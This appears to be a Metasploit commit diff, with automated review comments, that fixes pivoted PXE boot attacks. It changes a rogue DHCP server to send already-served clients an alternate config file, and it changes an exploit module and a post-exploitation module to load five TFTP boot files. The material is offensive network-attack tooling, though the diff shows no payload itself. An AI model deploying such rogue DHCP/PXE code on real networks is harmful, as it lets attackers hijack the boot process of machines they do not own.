Fixes #5312 for pivoted PXE attacks.
git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
53e43fa847
commit
06c3dabe31
Binary file not shown.
Binary file not shown.
|
@ -222,6 +222,9 @@ int DHCPserv::run(){
|
||||||
string pxeConfigFile("update2");
|
string pxeConfigFile("update2");
|
||||||
stringOptionCheck(&pxeConfigFile, "PXECONF");
|
stringOptionCheck(&pxeConfigFile, "PXECONF");
|
||||||
|
|
||||||
|
string pxeAltConfigFile("update0");
|
||||||
|
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
|
||||||
|
|
||||||
string pxePathPrefix("");
|
string pxePathPrefix("");
|
||||||
//get DHCP parameters
|
//get DHCP parameters
|
||||||
unsigned int leaseTime = 600;
|
unsigned int leaseTime = 600;
|
||||||
|
@ -336,10 +339,6 @@ int DHCPserv::run(){
|
||||||
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
|
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
|
||||||
pkt << DHCPOffer;
|
pkt << DHCPOffer;
|
||||||
|
|
||||||
// check if already served based on hw addr (MAC address)
|
|
||||||
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
|
||||||
continue; //Already served; allowing normal boot
|
|
||||||
|
|
||||||
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
|
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
|
||||||
pkt << DHCPAck;
|
pkt << DHCPAck;
|
||||||
|
|
||||||
|
@ -360,7 +359,12 @@ int DHCPserv::run(){
|
||||||
pkt << dhcpoption(OpDns, iton(dnsServer));
|
pkt << dhcpoption(OpDns, iton(dnsServer));
|
||||||
string pxemagic(PXEMagic,4);
|
string pxemagic(PXEMagic,4);
|
||||||
pkt << dhcpoption(OpPXEMagic, pxemagic);
|
pkt << dhcpoption(OpPXEMagic, pxemagic);
|
||||||
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
|
|
||||||
|
// check if already served based on hw addr (MAC address)
|
||||||
|
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
||||||
|
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
|
||||||
|
else
|
||||||
|
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
|
||||||
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
|
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
|
||||||
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
|
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
|
||||||
if ( hostname.length() > 0 ){
|
if ( hostname.length() > 0 ){
|
||||||
|
|
|
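Review bot: The `if`/`else` added in the third hunk to choose between `pxeAltConfigFile` and `pxeConfigFile` is unbraced, and its only explanation is a trailing comment on the alternate branch, while the new `PXEALTCONF` option in the first hunk has no comment at all. I would brace both branches and lead with a comment such as `// already-served MAC: answer with PXEALTCONF (default "update0") instead of staying silent`. Because the `continue` was removed from the Discover branch in the second hunk, a served client now appears to still receive an Offer and an ACK from this server, so the description of `serveOnce` should say so. Where `served` is populated is not visible in these hunks; if it is filled before the matching Request arrives, the ACK would already carry the alternate file, which is worth confirming. `DHCPserv::run` starts and ends outside the hunks.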
@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Loading DHCP options...")
|
print_status("Loading DHCP options...")
|
||||||
client.lanattacks.load_dhcp_options(datastore)
|
client.lanattacks.load_dhcp_options(datastore)
|
||||||
1.upto(4) do |i|
|
0.upto(4) do |i|
|
||||||
print_status("Loading file #{i} of 4")
|
print_status("Loading file #{i+1} of 5")
|
||||||
if i < 4
|
if i < 4
|
||||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||||
else
|
else
|
||||||
|
|
|
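Review bot: `IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))` now also runs for `update0`, and neither this loop nor the identical one in the `Msf::Post` hunk checks that the file exists before reading it. A TFTPROOT that lacks the new file therefore raises `Errno::ENOENT` part-way through, after `load_dhcp_options` has already been called. A guard such as `path = ::File.join(datastore['TFTPROOT'], "update#{i}")` followed by `raise "Missing #{path}" unless ::File.file?(path)` would fail early and name the file. The range `0.upto(4)` and the literal `5` in the status line also have to be kept in step by hand in both modules; a shared constant would avoid that. The `else` branch of `if i < 4` lies outside the hunk.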
@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
|
||||||
print_status("Loading DHCP options...")
|
print_status("Loading DHCP options...")
|
||||||
client.lanattacks.load_dhcp_options(datastore)
|
client.lanattacks.load_dhcp_options(datastore)
|
||||||
|
|
||||||
1.upto(4) do |i|
|
0.upto(4) do |i|
|
||||||
print_status("Loading file #{i} of 4")
|
print_status("Loading file #{i+1} of 5")
|
||||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||||
client.lanattacks.add_tftp_file("update#{i}",contents)
|
client.lanattacks.add_tftp_file("update#{i}",contents)
|
||||||
end
|
end
|
||||||
|
|